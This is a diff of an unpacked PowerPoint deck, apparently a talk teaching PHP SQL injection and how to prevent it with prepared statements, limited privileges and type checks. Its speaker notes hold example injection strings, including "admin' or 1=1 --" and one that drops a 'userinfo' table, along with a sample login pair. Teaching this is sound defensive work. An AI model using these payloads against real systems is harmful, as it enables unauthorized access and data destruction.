--- a/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
+++ b/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
@@ -5,10 +5,10 @@
     <p:sldMasterId id="2147485495" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId25"/>
+    <p:notesMasterId r:id="rId26"/>
   </p:notesMasterIdLst>
   <p:handoutMasterIdLst>
-    <p:handoutMasterId r:id="rId26"/>
+    <p:handoutMasterId r:id="rId27"/>
   </p:handoutMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
@@ -28,12 +28,13 @@
     <p:sldId id="396" r:id="rId16"/>
     <p:sldId id="397" r:id="rId17"/>
     <p:sldId id="398" r:id="rId18"/>
-    <p:sldId id="388" r:id="rId19"/>
-    <p:sldId id="392" r:id="rId20"/>
-    <p:sldId id="393" r:id="rId21"/>
-    <p:sldId id="399" r:id="rId22"/>
-    <p:sldId id="400" r:id="rId23"/>
-    <p:sldId id="333" r:id="rId24"/>
+    <p:sldId id="401" r:id="rId19"/>
+    <p:sldId id="388" r:id="rId20"/>
+    <p:sldId id="392" r:id="rId21"/>
+    <p:sldId id="393" r:id="rId22"/>
+    <p:sldId id="399" r:id="rId23"/>
+    <p:sldId id="400" r:id="rId24"/>
+    <p:sldId id="333" r:id="rId25"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3475,7 +3476,7 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>Never connect to database as super user =&gt; limited privileges</a:t>
+              <a:t>mysql_query</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -3500,7 +3501,7 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>Use prepared statements with bound variables</a:t>
+              <a:t>mysqli_query</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -3525,23 +3526,7 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>Check input has expected data type: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>is_numeric</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>()</a:t>
+              <a:t>PDO (PHP Data Objects)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -3566,39 +3551,12 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>Change input type: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>settype</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>()</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:t>framework</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
               </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="+mn-lt"/>
-              <a:ea typeface="+mn-ea"/>
-              <a:cs typeface="+mn-cs"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -3630,7 +3588,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2167241784"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4001004888"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3684,195 +3642,132 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Login normal: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>quangsonpro, langtutuoiteen</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Never connect to database as super user =&gt; limited privileges</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
             </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Login hacked: admin’ or 1=1</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> --</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0">
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Login hacked: admin' or 1=1 LIMIT 1 – </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Login</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> hacked: admin’ or 1=1; Drop table </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>userinfo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> --  &lt;change a line of code if ($result = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>mysqli_multi_query</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>($conn, $</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>sql</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>)) {</a:t>
-            </a:r>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Use prepared statements with bound variables</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Check input has expected data type: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>is_numeric</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Change input type: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>settype</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>()</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
@@ -3912,7 +3807,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1263682537"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2167241784"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4044,6 +3939,127 @@
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Login hacked: admin' or 1=1 LIMIT 1 – </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Login</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> hacked: admin’ or 1=1; Drop table </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>userinfo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> --  &lt;change a line of code if ($result = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>mysqli_multi_query</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>($conn, $</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>sql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>)) {</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:effectLst/>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:endParaRPr>
+          </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -4073,7 +4089,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442560568"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1263682537"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4270,6 +4286,46 @@
               <a:t>quangsonpro, langtutuoiteen</a:t>
             </a:r>
           </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Login hacked: admin’ or 1=1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> --</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -4299,7 +4355,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2368136216"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442560568"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4388,6 +4444,127 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
+              <a:t>quangsonpro, langtutuoiteen</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="10"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{35845946-0CF3-4C0F-AF5C-F563F65A0652}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:pPr/>
+              <a:t>22</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2368136216"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide22.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Slide Image Placeholder 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Notes Placeholder 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Login normal: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
               <a:t>quangsonpro</a:t>
             </a:r>
             <a:r>
@@ -4424,7 +4601,7 @@
             <a:fld id="{35845946-0CF3-4C0F-AF5C-F563F65A0652}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>22</a:t>
+              <a:t>23</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -15082,7 +15259,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="125944" y="1018034"/>
+            <a:off x="191928" y="1018034"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -15238,7 +15415,7 @@
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Summary</a:t>
+              <a:t>Why it works?</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -15257,8 +15434,8 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="457200" y="2547533"/>
-            <a:ext cx="8229600" cy="3361133"/>
+            <a:off x="457200" y="2161034"/>
+            <a:ext cx="8229600" cy="4369962"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -15453,20 +15630,12 @@
               <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Never connect to </a:t>
-            </a:r>
-            <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>database as super user =&gt; limited privileges</a:t>
+              <a:t>Old way: send mixing of code and data</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -15474,7 +15643,7 @@
               <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               <a:buChar char="•"/>
             </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
               </a:solidFill>
@@ -15486,12 +15655,20 @@
               <a:buChar char="•"/>
             </a:pPr>
             <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>New idea: query &amp; data </a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="en-US" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>Use prepared statements with bound </a:t>
+              <a:t>are sent to </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0">
@@ -15499,15 +15676,25 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>variables</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
